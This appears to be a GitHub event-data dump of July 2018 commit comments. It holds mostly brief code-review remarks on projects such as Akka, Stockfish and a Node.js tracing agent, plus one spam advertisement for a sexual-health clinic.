{"id":"7935811634","type":"CommitCommentEvent","actor":{"login":"James-W2"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29637289,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-09T07:14:59Z","updated_at":"2018-07-09T07:14:59Z","author_association":"NONE","body":"Any changes since my previous comment?  I could not find where the actual script is located, but I found a downloaded copy I requested from GitHub from 5/2018.  My plan was to edit with your corrections.  However, when I tried to open the Pandora script, I rec'd the enclosed error message concerning line 13, which was not part of your edit.  I also enclosed a copy of script, including your edit. This also gets the same error message when opened, unless I tell it to use notepad to open.  \r\n\r\nI'm computer savvy and even have several MS credentials (though in NT).  However, I'm not a programmer or coder, so unsure how to find extensions in Chrome in order to edit this script properly. Also, I don't know what the problem is with line 13.\r\n\r\nThanks for your help with this.\r\n\r\n![script host](https://user-images.githubusercontent.com/28333950/42435401-4213457e-830b-11e8-8b39-16ab70f89ad0.PNG)\r\n[pandora-edit.txt](https://github.com/web-scrobbler/web-scrobbler/files/2174930/pandora-edit.txt)"}},"created_at":"2018-07-09T07:14:59Z"}
{"id":"7935815833","type":"CommitCommentEvent","actor":{"login":"rc1021"},"repo":{"name":"rc1021/mysite-suyu"},"payload":{"comment":{"id":29637299,"position":35,"line":32,"path":"blog/templates/home.html","commit_id":"f8246776a886a6cd9b72e50ca542fb8d244925ef","created_at":"2018-07-09T07:16:05Z","updated_at":"2018-07-09T07:16:05Z","author_association":"OWNER","body":"改成 bootstrap 的 navbar \r\n\r\n其中 20~22 行的程式內容是當視窗變成手機或平板時，畫面會把 menu 收起來成為 icon 圖示，點選 icon 圖示會展開  menu (`這時就需要用到 bootstrap 的 javascript`)"}},"created_at":"2018-07-09T07:16:05Z"}
{"id":"7935823414","type":"CommitCommentEvent","actor":{"login":"dinams"},"repo":{"name":"helpmefightbackPlease/My-Life-is-a-MultiPlayer-game"},"payload":{"comment":{"id":29637325,"position":1,"line":1,"path":"README.md","commit_id":"bacd02fc8cb587a88bd6a234eda78d913722fac1","created_at":"2018-07-09T07:18:00Z","updated_at":"2018-07-09T07:18:00Z","author_association":"NONE","body":"Is"}},"created_at":"2018-07-09T07:18:00Z"}
{"id":"7935824505","type":"CommitCommentEvent","actor":{"login":"martinvw"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29637331,"position":null,"line":null,"path":null,"commit_id":"7596dffa0bfa2d1f38d3331217e9dfdb7fa2b73e","created_at":"2018-07-09T07:18:15Z","updated_at":"2018-07-09T07:18:15Z","author_association":"MEMBER","body":"This is a bad way of rending from from GitHub the changes are still in the master see: https://github.com/openhab/openhab2-addons/blob/master/addons/binding/org.openhab.binding.robonect/src/main/java/org/openhab/binding/robonect/internal/model/cmd/ModeCommand.java#L34"}},"created_at":"2018-07-09T07:18:15Z"}
{"id":"7935825210","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637332,"position":15,"line":15,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:18:26Z","updated_at":"2018-07-09T07:18:26Z","author_association":"MEMBER","body":"I think there should be another argument which is `SpanContext` of parent span. So `traceId` and parent `spanId` should be retrieved from here. If not needed, we should not pass parent span directly here (think about distributed tracing support later)"}},"created_at":"2018-07-09T07:18:26Z"}
{"id":"7935826343","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"akka/akka-persistence-cassandra"},"payload":{"comment":{"id":29637334,"position":4,"line":98,"path":"core/src/main/scala/akka/persistence/cassandra/ConfigSessionProvider.scala","commit_id":"36c29c2827ea2c0fdbd4376591d649cb857be626","created_at":"2018-07-09T07:18:43Z","updated_at":"2018-07-09T07:18:43Z","author_association":"MEMBER","body":"@TimMoore The whole config of akka-persistence-cassandra is in need of refactoring, and that is the main task of 1.0. I don't think we should make such config optional in code with `hasProperty`, but instead one should have a fallback to the default values as documented here: https://github.com/akka/akka-persistence-cassandra/blob/master/core/src/main/resources/reference.conf#L7-L14\r\n\r\nIn Lagom that is not feasible since it's not an application and therefore config is copied into Lagom, which has the problem that new config must be maintained there also. Absolutely not a good solution, but until we change the way config is defined in akka-persistence-cassandra I think we have to live with that."}},"created_at":"2018-07-09T07:18:43Z"}
{"id":"7935827049","type":"CommitCommentEvent","actor":{"login":"kangjinhwan"},"repo":{"name":"kangjinhwan/kangjinhwan"},"payload":{"comment":{"id":29637335,"position":1,"line":10,"path":"LoginRegistrationForm/LoginRegistrationForm/css/animate-custom.css","commit_id":"c4caa47aeb89f22092d395ea6bed02c0fe5f9152","created_at":"2018-07-09T07:18:54Z","updated_at":"2018-07-09T07:18:54Z","author_association":"OWNER","body":"??"}},"created_at":"2018-07-09T07:18:54Z"}
{"id":"7935827209","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637336,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T07:18:56Z","updated_at":"2018-07-09T07:18:56Z","author_association":"CONTRIBUTOR","body":"You could do the same for rttiGetElemSize, and rttiWriteElem as well. Since the order of parameters to write is preserved, you can potentially save a decent amount of typing, and certainly a missing \"data = \" by people who aren't familiar with the rtti framework."}},"created_at":"2018-07-09T07:18:56Z"}
{"id":"7935829027","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637339,"position":44,"line":44,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:19:24Z","updated_at":"2018-07-09T07:19:24Z","author_association":"MEMBER","body":"`traceId` should not be decided by span itself. It should be passed as argument to the span from outside inside `SpanContext` of parent span."}},"created_at":"2018-07-09T07:19:24Z"}
{"id":"7935830088","type":"CommitCommentEvent","actor":{"login":"sirius41"},"repo":{"name":"sirius41/Janken_B16007"},"payload":{"comment":{"id":29637343,"position":null,"line":null,"path":null,"commit_id":"ae37ba36692babfacc220744d7d4885f2d0491a6","created_at":"2018-07-09T07:19:41Z","updated_at":"2018-07-09T07:19:41Z","author_association":"OWNER","body":"正常に動作することを確認しました。"}},"created_at":"2018-07-09T07:19:41Z"}
{"id":"7935831754","type":"CommitCommentEvent","actor":{"login":"martinvw"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29637346,"position":null,"line":null,"path":null,"commit_id":"7596dffa0bfa2d1f38d3331217e9dfdb7fa2b73e","created_at":"2018-07-09T07:20:08Z","updated_at":"2018-07-09T07:20:08Z","author_association":"MEMBER","body":"It was actually to remove the homematic plugin which was moved to the ESH repo, see\r\n\r\nhttps://github.com/openhab/openhab2-addons/pull/3714"}},"created_at":"2018-07-09T07:20:08Z"}
{"id":"7935834789","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637349,"position":22,"line":22,"path":"src/opentracing/Tracer.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:20:53Z","updated_at":"2018-07-09T07:20:53Z","author_association":"MEMBER","body":"`_finishSpan` method should be provided with no arg. So user can close current span without having its reference."}},"created_at":"2018-07-09T07:20:53Z"}
{"id":"7935836161","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29637351,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T07:21:12Z","updated_at":"2018-07-09T07:21:12Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2971 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T07:21:12Z"}
{"id":"7935837044","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637356,"position":55,"line":1296,"path":"Source/Plugins/bsfRenderBeast/BsRenderCompositor.cpp","commit_id":"0c9e1d2d6aeed14a951eea9df443dd3667a9721c","created_at":"2018-07-09T07:21:25Z","updated_at":"2018-07-09T07:21:25Z","author_association":"CONTRIBUTOR","body":"Even though addTaskGroup doesn't currently accept the parameter by move, it might some day in the future. Using a call to std::move() here is free at runtime (minuscule cost at compile time, of course), but saves you an atomic operation if you ever change addTaskGroup to accept paramter by move."}},"created_at":"2018-07-09T07:21:25Z"}
{"id":"7935837594","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637358,"position":22,"line":22,"path":"src/opentracing/Tracer.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:21:33Z","updated_at":"2018-07-09T07:21:33Z","author_association":"MEMBER","body":"`_getSpan` method should be provided with no arg. So user can access to current span and add its tags for example."}},"created_at":"2018-07-09T07:21:33Z"}
{"id":"7935839180","type":"CommitCommentEvent","actor":{"login":"Ezibenroc"},"repo":{"name":"simgrid/simgrid"},"payload":{"comment":{"id":29637361,"position":27,"line":123,"path":"tools/simgrid_convert_TI_traces.py","commit_id":"11ee0cfd2a23399ec4f1e4e4e93547f09a31113a","created_at":"2018-07-09T07:21:56Z","updated_at":"2018-07-09T07:21:56Z","author_association":"COLLABORATOR","body":"Better:\r\n```python\r\nif os.path.isabs(trace_path):\r\n    sys.exit(\"ERROR: Absolute path in the trace list file is not supported\")\r\n```\r\nI find it clearer. Also, the message will be printed on `stderr` and not `stdout`."}},"created_at":"2018-07-09T07:21:56Z"}
{"id":"7935840338","type":"CommitCommentEvent","actor":{"login":"levanquang15081998"},"repo":{"name":"levanquang1508/Front-End"},"payload":{"comment":{"id":29637366,"position":null,"line":null,"path":null,"commit_id":"ea7d6c31da657bd48fe718d3bdf8fbf42822a039","created_at":"2018-07-09T07:22:13Z","updated_at":"2018-07-09T07:22:13Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-09T07:22:13Z"}
{"id":"7935867051","type":"CommitCommentEvent","actor":{"login":"Kazim1212"},"repo":{"name":"Kazim1212/fars_package"},"payload":{"comment":{"id":29637426,"position":null,"line":null,"path":null,"commit_id":"8d337e5c479b246e361e61ca5a4aaa63a548d8d2","created_at":"2018-07-09T07:28:32Z","updated_at":"2018-07-09T07:28:32Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-09T07:28:32Z"}
{"id":"7935868040","type":"CommitCommentEvent","actor":{"login":"ajorquera"},"repo":{"name":"ajorquera/pano-editor"},"payload":{"comment":{"id":29637428,"position":4,"line":9,"path":"public/index.html","commit_id":"7a756fc6050ac6e6ad5225f2dd8bee6fd4ceaf74","created_at":"2018-07-09T07:28:46Z","updated_at":"2018-07-09T07:28:46Z","author_association":"OWNER","body":"You are not supposed to inyect these scripts here"}},"created_at":"2018-07-09T07:28:46Z"}
{"id":"7935868601","type":"CommitCommentEvent","actor":{"login":"ajorquera"},"repo":{"name":"ajorquera/pano-editor"},"payload":{"comment":{"id":29637429,"position":4,"line":9,"path":"public/index.html","commit_id":"7a756fc6050ac6e6ad5225f2dd8bee6fd4ceaf74","created_at":"2018-07-09T07:28:55Z","updated_at":"2018-07-09T07:28:55Z","author_association":"OWNER","body":"@millwala53 "}},"created_at":"2018-07-09T07:28:55Z"}
{"id":"7935869091","type":"CommitCommentEvent","actor":{"login":"Kazim1212"},"repo":{"name":"Kazim1212/fars_package"},"payload":{"comment":{"id":29637430,"position":1,"line":1,"path":"README.md","commit_id":"8d337e5c479b246e361e61ca5a4aaa63a548d8d2","created_at":"2018-07-09T07:29:02Z","updated_at":"2018-07-09T07:29:02Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-09T07:29:02Z"}
{"id":"7935870126","type":"CommitCommentEvent","actor":{"login":"Kazim1212"},"repo":{"name":"Kazim1212/fars_package"},"payload":{"comment":{"id":29637434,"position":null,"line":null,"path":null,"commit_id":"8d337e5c479b246e361e61ca5a4aaa63a548d8d2","created_at":"2018-07-09T07:29:16Z","updated_at":"2018-07-09T07:29:16Z","author_association":"OWNER","body":"new updated"}},"created_at":"2018-07-09T07:29:16Z"}
{"id":"7935875218","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-5-js"},"payload":{"comment":{"id":29637442,"position":null,"line":null,"path":null,"commit_id":"8b1c3ad6e6b5e2cc9e44cf89d300914ea49497f3","created_at":"2018-07-09T07:30:27Z","updated_at":"2018-07-09T07:30:27Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-09T07:30:27Z"}
{"id":"7935876818","type":"CommitCommentEvent","actor":{"login":"michaelzangerle"},"repo":{"name":"fusonic/symfony-rate-limit-bundle"},"payload":{"comment":{"id":29637445,"position":15,"line":14,"path":"Fusonic/RateLimitBundle/src/Resources/config/services.yml","commit_id":"166bf80c293372cebd92bb11e1ab66b6b4a85edd","created_at":"2018-07-09T07:30:46Z","updated_at":"2018-07-09T07:30:46Z","author_association":"COLLABORATOR","body":"@atroy Yes. The compiler pass will set the appropriate service. Can't think of a meaningful value as it will be replaced anyway. Maybe a string constant?"}},"created_at":"2018-07-09T07:30:46Z"}
{"id":"7935878634","type":"CommitCommentEvent","actor":{"login":"gopi6sigma"},"repo":{"name":"gopi6sigma/mtt"},"payload":{"comment":{"id":29637447,"position":101,"line":196,"path":"webclient/app/qp_2017_prelim.html","commit_id":"bcbcdd24900449da28abe99929076ac1acbb0086","created_at":"2018-07-09T07:31:09Z","updated_at":"2018-07-09T07:31:09Z","author_association":"OWNER","body":"No %s please!! Find a value from the sample papers shared."}},"created_at":"2018-07-09T07:31:09Z"}
{"id":"7935878713","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29637449,"position":null,"line":null,"path":null,"commit_id":"7058ddbb66084bee9cd507ed69f031ec1262163e","created_at":"2018-07-09T07:31:11Z","updated_at":"2018-07-09T07:31:11Z","author_association":"CONTRIBUTOR","body":"![floating](http://gifimage.net/wp-content/uploads/2018/06/we-all-float-down-here-gif-12.gif)"}},"created_at":"2018-07-09T07:31:11Z"}
{"id":"7935881876","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29637454,"position":46,"line":274,"path":"tools/import-t2t-mt-model.py","commit_id":"e097969e277fa04c67e978f9b13b4659d696e743","created_at":"2018-07-09T07:31:53Z","updated_at":"2018-07-09T07:31:53Z","author_association":"MEMBER","body":"That is not a config option but an option of the `RecLayer`."}},"created_at":"2018-07-09T07:31:53Z"}
{"id":"7935882525","type":"CommitCommentEvent","actor":{"login":"gopi6sigma"},"repo":{"name":"gopi6sigma/mtt"},"payload":{"comment":{"id":29637456,"position":109,"line":109,"path":"webclient/app/qp_2017_main.html","commit_id":"aebe3fdf37a4c10ddbbc03b25f31a1dfd3091800","created_at":"2018-07-09T07:32:03Z","updated_at":"2018-07-09T07:32:03Z","author_association":"OWNER","body":"Space after '.' and capital letter follows the full stop. Here and everywhere else."}},"created_at":"2018-07-09T07:32:03Z"}
{"id":"7935882603","type":"CommitCommentEvent","actor":{"login":"atroy"},"repo":{"name":"fusonic/symfony-rate-limit-bundle"},"payload":{"comment":{"id":29637457,"position":15,"line":14,"path":"Fusonic/RateLimitBundle/src/Resources/config/services.yml","commit_id":"166bf80c293372cebd92bb11e1ab66b6b4a85edd","created_at":"2018-07-09T07:32:04Z","updated_at":"2018-07-09T07:32:04Z","author_association":"MEMBER","body":"hmm I would prefer that, else it could be possible that someone removes this argument, bc he thinks its useless."}},"created_at":"2018-07-09T07:32:04Z"}
{"id":"7935884014","type":"CommitCommentEvent","actor":{"login":"gopi6sigma"},"repo":{"name":"gopi6sigma/mtt"},"payload":{"comment":{"id":29637465,"position":123,"line":123,"path":"webclient/app/qp_2017_main.html","commit_id":"aebe3fdf37a4c10ddbbc03b25f31a1dfd3091800","created_at":"2018-07-09T07:32:22Z","updated_at":"2018-07-09T07:32:22Z","author_association":"OWNER","body":"Space before and after the operator. Here and everywhere else."}},"created_at":"2018-07-09T07:32:22Z"}
{"id":"7935885822","type":"CommitCommentEvent","actor":{"login":"gopi6sigma"},"repo":{"name":"gopi6sigma/mtt"},"payload":{"comment":{"id":29637470,"position":129,"line":129,"path":"webclient/app/qp_2017_main.html","commit_id":"aebe3fdf37a4c10ddbbc03b25f31a1dfd3091800","created_at":"2018-07-09T07:32:46Z","updated_at":"2018-07-09T07:32:46Z","author_association":"OWNER","body":"\", which\" not \".which\""}},"created_at":"2018-07-09T07:32:46Z"}
{"id":"7935890703","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29637487,"position":55,"line":329,"path":"tools/import-t2t-mt-model.py","commit_id":"e097969e277fa04c67e978f9b13b4659d696e743","created_at":"2018-07-09T07:33:56Z","updated_at":"2018-07-09T07:33:56Z","author_association":"MEMBER","body":"I don't understand. The params are like this? I would rather expect that this multiplication is done on the activations (as part of the activation function or so), and not on the params. You could use an `EvalLayer` for this."}},"created_at":"2018-07-09T07:33:56Z"}
{"id":"7935893413","type":"CommitCommentEvent","actor":{"login":"gpgekko"},"repo":{"name":"Shmoopty/rpi-appliance-monitor"},"payload":{"comment":{"id":29637491,"position":35,"line":62,"path":"README.md","commit_id":"6b0583fdf9b3e246a9c93af37f17fd0376e7cbfb","created_at":"2018-07-09T07:34:35Z","updated_at":"2018-07-09T07:34:35Z","author_association":"NONE","body":"Introduced a typo here"}},"created_at":"2018-07-09T07:34:35Z"}
{"id":"7935897772","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637499,"position":14,"line":26,"path":"Source/Foundation/bsfCore/Scene/BsSceneManager.cpp","commit_id":"d2fe7c8b609a182ef2d10e23c2a5ad4638b662e8","created_at":"2018-07-09T07:35:37Z","updated_at":"2018-07-09T07:35:37Z","author_association":"CONTRIBUTOR","body":"I like making a class for this, something like \"AtScopeEnd\" which takes an arbitrary lambda function to execute when the destructor is called.\r\n\r\nHave a bool member variable to detect if it's been \"moved from\" as well, and it's really useful.\r\n\r\nThen you can do things like\r\n\r\nconst auto & atEnd = at_scope_end(&var = (val = true)]{ var = false; }); just like you have here (But with less typing), while also keeping it really generic.\r\n\r\nI can code something like this for you if you want."}},"created_at":"2018-07-09T07:35:37Z"}
{"id":"7935898102","type":"CommitCommentEvent","actor":{"login":"GuoZhiQiang"},"repo":{"name":"Rojuinex/react-native"},"payload":{"comment":{"id":29637500,"position":null,"line":null,"path":null,"commit_id":"4608b97b585363406dd2aa3646bde5ad3045d16d","created_at":"2018-07-09T07:35:41Z","updated_at":"2018-07-09T07:35:41Z","author_association":"NONE","body":"I create a new project by: `react-native init AwesomeProject` . The new project do not have those errors. Does it have a validity duration?"}},"created_at":"2018-07-09T07:35:41Z"}
{"id":"7935899654","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"js-tasks-ru/js-20180619_nki"},"payload":{"comment":{"id":29637506,"position":16,"line":18,"path":"5-module/1-task/index.js","commit_id":"11191d7dc893dc36d9b7ee07051d76f7ea741bc7","created_at":"2018-07-09T07:36:02Z","updated_at":"2018-07-09T07:36:02Z","author_association":"CONTRIBUTOR","body":"Лишняя пустая строка"}},"created_at":"2018-07-09T07:36:02Z"}
{"id":"7935901415","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"js-tasks-ru/js-20180619_nki"},"payload":{"comment":{"id":29637515,"position":30,"line":32,"path":"5-module/1-task/index.js","commit_id":"11191d7dc893dc36d9b7ee07051d76f7ea741bc7","created_at":"2018-07-09T07:36:28Z","updated_at":"2018-07-09T07:36:28Z","author_association":"CONTRIBUTOR","body":"всегда ==="}},"created_at":"2018-07-09T07:36:28Z"}
{"id":"7935902363","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637516,"position":8,"line":480,"path":"circus/arbiter.py","commit_id":"04bb3ca34b89c26d8c709d0418bee49823f21038","created_at":"2018-07-09T07:36:41Z","updated_at":"2018-07-09T07:36:41Z","author_association":"NONE","body":"Haakjes frond `(name, socket)` zijn niet nodig."}},"created_at":"2018-07-09T07:36:41Z"}
{"id":"7935907252","type":"CommitCommentEvent","actor":{"login":"KlavsKlavsen"},"repo":{"name":"voxpupuli/puppet-gitlab"},"payload":{"comment":{"id":29637532,"position":105,"line":188,"path":"README.md","commit_id":"517469bd45e4a9ef61884550302b1080e53e2540","created_at":"2018-07-09T07:37:48Z","updated_at":"2018-07-09T07:37:48Z","author_association":"NONE","body":"but I can't set packagename. its NOT in the primary class."}},"created_at":"2018-07-09T07:37:48Z"}
{"id":"7935908343","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637538,"position":13,"line":154,"path":"Source/Foundation/bsfCore/Scene/BsSceneManager.h","commit_id":"d2fe7c8b609a182ef2d10e23c2a5ad4638b662e8","created_at":"2018-07-09T07:38:04Z","updated_at":"2018-07-09T07:38:04Z","author_association":"CONTRIBUTOR","body":"Wouldn't list initialization (or aggregate? always hard to remember names) be more sensible for this type of mini-struct?\r\n\r\nOr maybe even just std::pair ?"}},"created_at":"2018-07-09T07:38:04Z"}
{"id":"7935910980","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637549,"position":13,"line":154,"path":"Source/Foundation/bsfCore/Scene/BsSceneManager.h","commit_id":"d2fe7c8b609a182ef2d10e23c2a5ad4638b662e8","created_at":"2018-07-09T07:38:41Z","updated_at":"2018-07-09T07:38:41Z","author_association":"CONTRIBUTOR","body":"I meant not having a defined constructor at all, and then creating the struct like\r\n"}},"created_at":"2018-07-09T07:38:41Z"}
{"id":"7935912172","type":"CommitCommentEvent","actor":{"login":"rondhanezz"},"repo":{"name":"rondhanezz/rondhanezz"},"payload":{"comment":{"id":29637555,"position":null,"line":null,"path":null,"commit_id":"69b10350577b215011a684cf36e029d607de2801","created_at":"2018-07-09T07:38:59Z","updated_at":"2018-07-09T07:38:59Z","author_association":"OWNER","body":"Are DIVYA Arogyam Sansthan you suffering from premature ejaculation..???\r\nBook your appointment now - 9870161334 \r\n\tor \r\nMail- Kamasutraorder@gmail.com\r\n# divyakamasutra \r\n#AyurvedaClinic \r\n#Infertility \r\n#Treatment\r\n#NaturalTreatments \r\n#PrematureEjaculation \r\n#SufferingProblem\r\nhttps://www.facebook.com/DIVYA-Arogyam-Sansthan-462440350850117/\r\n"}},"created_at":"2018-07-09T07:38:59Z"}
{"id":"7935912299","type":"CommitCommentEvent","actor":{"login":"michaelzangerle"},"repo":{"name":"fusonic/symfony-rate-limit-bundle"},"payload":{"comment":{"id":29637557,"position":15,"line":14,"path":"Fusonic/RateLimitBundle/src/Resources/config/services.yml","commit_id":"166bf80c293372cebd92bb11e1ab66b6b4a85edd","created_at":"2018-07-09T07:39:01Z","updated_at":"2018-07-09T07:39:01Z","author_association":"COLLABORATOR","body":"Well that's highly unlikely because that would break everything and the tests would not run through."}},"created_at":"2018-07-09T07:39:01Z"}
{"id":"7935914838","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637566,"position":11,"line":483,"path":"circus/arbiter.py","commit_id":"04bb3ca34b89c26d8c709d0418bee49823f21038","created_at":"2018-07-09T07:39:37Z","updated_at":"2018-07-09T07:39:37Z","author_association":"NONE","body":"Voor dit soort sorts is er de `operator` module, als je die gebruikt in plaats van `lambda` is de code aanzienlijk sneller, omdat de lambda in Python uitgevoerd wordt terwijl de operator partials in C worden uitgevoerd:\r\n```\r\nsorted(wanted_watchers, key=operator.attrgetter('priority'), reverse=reverse)\r\n```"}},"created_at":"2018-07-09T07:39:37Z"}
{"id":"7935920851","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29637580,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T07:40:59Z","updated_at":"2018-07-09T07:40:59Z","author_association":"NONE","body":"Just for information, here more explicit representation of the skip-scheme this patch produces :-)\r\n```\r\nidx   skip scheme\r\n  1   1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 %\r\n  2   1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 %\r\n  3   1 1 0 0 1 1 0 0 1 1 0 0 1 1 0 0 %\r\n  4   0 1 1 0 0 1 1 0 0 1 1 0 0 1 1 0 %\r\n  5   1 1 0 0 1 1 0 0 1 1 0 0 1 1 0 0 %\r\n  6   0 1 1 0 0 1 1 0 0 1 1 0 0 1 1 0 %\r\n  7   0 1 1 1 0 0 0 1 1 1 0 0 0 1 1 1 %\r\n  8   1 1 1 0 0 0 1 1 1 0 0 0 1 1 1 0 %\r\n  9   0 0 1 1 1 0 0 0 1 1 1 0 0 0 1 1 %\r\n 10   0 1 1 1 0 0 0 1 1 1 0 0 0 1 1 1 %\r\n 11   1 1 1 0 0 0 1 1 1 0 0 0 1 1 1 0 %\r\n 12   0 0 1 1 1 0 0 0 1 1 1 0 0 0 1 1 %\r\n 13   0 1 1 1 0 0 0 1 1 1 0 0 0 1 1 1 %\r\n 14   1 1 1 0 0 0 1 1 1 0 0 0 1 1 1 0 %\r\n 15   1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 0 %\r\n 16   0 0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 %\r\n 17   0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 %\r\n 18   0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 %\r\n 19   1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 0 %\r\n 20   0 0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 %\r\n 21   0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 %\r\n 22   0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 %\r\n 23   1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 0 %\r\n 24   0 0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 %\r\n 25   0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 %\r\n 26   0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 %\r\n 27   1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 0 %\r\n 28   0 0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 %\r\n 29   0 0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 %\r\n 30   0 1 1 1 1 0 0 0 0 1 1 1 1 0 0 0 %\r\n 31   0 0 0 1 1 1 1 1 0 0 0 0 0 1 1 1 %\r\n...\r\n255   1 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 %\r\n256   0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 0 %\r\n257   0 0 0 0 0 0 1 1 1 1 1 1 1 1 0 0 %\r\n258   0 0 0 0 0 1 1 1 1 1 1 1 1 0 0 0 %\r\n259   0 0 0 0 1 1 1 1 1 1 1 1 0 0 0 0 %\r\n260   0 0 0 1 1 1 1 1 1 1 1 0 0 0 0 0 %\r\n261   0 0 1 1 1 1 1 1 1 1 0 0 0 0 0 0 %\r\n262   0 1 1 1 1 1 1 1 1 0 0 0 0 0 0 0 %\r\n%\r\n```"}},"created_at":"2018-07-09T07:40:59Z"}
{"id":"7935921754","type":"CommitCommentEvent","actor":{"login":"jreznot"},"repo":{"name":"cuba-platform/masquerade"},"payload":{"comment":{"id":29637581,"position":152,"line":152,"path":"modules/web/src/main/java/com/haulmont/masquerade/components/DataGrid.java","commit_id":"4a55109859cadcbaf827a4fc3c189c90ced306d7","created_at":"2018-07-09T07:41:12Z","updated_at":"2018-07-09T07:41:12Z","author_association":"MEMBER","body":"Please provide convenient version of getHeaderCell(String columnId)"}},"created_at":"2018-07-09T07:41:12Z"}
